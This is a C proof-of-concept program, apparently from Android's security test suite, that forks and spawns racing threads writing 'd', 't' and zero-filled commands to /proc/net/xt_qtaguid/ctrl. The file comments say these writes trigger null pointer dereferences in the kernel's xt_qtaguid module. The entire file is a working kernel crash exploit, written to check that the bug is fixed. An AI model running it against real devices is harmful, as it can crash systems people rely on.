/**
 * Copyright (C) 2018 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

/* Number of racing worker threads spawned per iteration. */
#define MAX_THREAD 6

/* Descriptor for /proc/net/xt_qtaguid/ctrl: opened by main(), written by workers. */
int ctrl_fd;
/*
 * Start signal shared between main() and the workers: 0 = wait, 1 = go,
 * -1 = abort (thread creation failed). It is _Atomic because other threads
 * poll it in a spin loop. A plain int read there is a data race (undefined
 * behavior), and the compiler would be free to hoist the load out of the loop.
 */
static _Atomic int cmd;
/*
 * Per-worker progress flags: 0 = reset, 1 = ready, 2 = done. Atomic for the
 * same reason as cmd. main() also relies on observing status == 2 to know
 * that a worker has finished with ctrl_fd and sock_fd.
 */
static _Atomic int status[MAX_THREAD];
/* Socket whose descriptor number is embedded in the "t" command. */
static int sock_fd;

/*
 * Worker body for the race.
 *
 * Each worker marks itself ready (status 1) and spins until main() sets
 * cmd to 1 (go) or -1 (abort). Unless aborted, it issues one write() to
 * ctrl_fd, then marks itself done (status 2).
 *
 * The payload depends on index % 3:
 *   0: "d 0"
 *   1: the zero-filled buffer, sizeof(buf) bytes long (len keeps its initial value)
 *   2: "t <sock_fd>"
 * NOTE(review): "d"/"t" are presumably xt_qtaguid delete/tag ctrl commands;
 * confirm against the kernel module.
 *
 * @param arg  worker index in [0, MAX_THREAD), smuggled through the pointer.
 * @return     always NULL.
 */
void *thread_entry(void *arg) {
  int index = (int)(unsigned long)arg;
  char buf[256];
  int len = (int)sizeof(buf);

  memset(buf, 0x0, sizeof(buf));
  status[index] = 1;

  // cmd == -1 signifies an error in thread creation; cmd == 1 means "go".
  while (cmd != 1 && cmd != -1) {
    usleep(5);
  }

  if (cmd != -1) {
    switch (index % 3) {
      case 0:
        len = snprintf(buf, sizeof(buf), "d %lu", (unsigned long)0);
        break;
      case 2:
        len = snprintf(buf, sizeof(buf), "t %d", sock_fd);
        break;
      default:
        // Deliberately send the whole zero-filled buffer.
        break;
    }

    // Result intentionally ignored: the PoC only needs the writes to race.
    (void)write(ctrl_fd, buf, len);
  }

  status[index] = 2;
  return NULL;
}
/*
 * This PoC creates multiple threads that concurrently write to the
 * /proc/net/xt_qtaguid/ctrl file, which causes null pointer dereferences in
 * netstat.
 */
/* Spin (sleeping briefly between polls) until every worker's status equals want. */
static void wait_all_status(int want) {
  for (;;) {
    int all_match = 1;
    for (int i = 0; i < MAX_THREAD; i++) {
      if (status[i] != want) {
        all_match = 0;
        break;
      }
    }
    if (all_match) {
      return;
    }
    usleep(5);
  }
}

/*
 * Repeatedly (up to 1024 times) opens /dev/xt_qtaguid and the ctrl file,
 * starts MAX_THREAD workers, and releases them at once so their ctrl writes
 * race. Returns -1 if either open fails or a worker cannot be created,
 * and 0 otherwise.
 */
int main() {
  int fd, retry = 1024;
  int ret, i, created;
  pthread_t tid[MAX_THREAD];

  // Both parent and child (when fork succeeds) run the loop below, doubling
  // the contention. The return value is intentionally ignored.
  fork();
  sock_fd = socket(AF_INET, SOCK_STREAM, 0);
  while (retry--) {
    cmd = 0;
    for (i = 0; i < MAX_THREAD; i++) {
      status[i] = 0;
    }

    fd = open("/dev/xt_qtaguid", O_RDONLY);
    if (fd < 0) {
      return -1;
    }

    ctrl_fd = open("/proc/net/xt_qtaguid/ctrl", O_RDWR);
    if (ctrl_fd < 0) {
      close(fd);
      return -1;
    }

    for (created = 0; created < MAX_THREAD; created++) {
      ret = pthread_create(&tid[created], NULL, thread_entry,
                           (void *)(unsigned long)created);
      if (ret != 0) {
        break;
      }
    }

    if (created < MAX_THREAD) {
      // Not all workers exist, so waiting for MAX_THREAD ready flags would
      // hang forever. Tell the started ones to exit without writing, reap
      // them, and give up.
      cmd = -1;
      for (i = 0; i < created; i++) {
        pthread_join(tid[i], NULL);
      }
      close(ctrl_fd);
      close(fd);
      return -1;
    }

    // Release all workers together only once every one of them is ready.
    wait_all_status(1);
    cmd = 1;
    wait_all_status(2);

    // Reap the workers and release this iteration's descriptors so that
    // neither threads nor fds accumulate across retries.
    for (i = 0; i < MAX_THREAD; i++) {
      pthread_join(tid[i], NULL);
    }
    close(ctrl_fd);
    close(fd);
  }
  return 0;
}
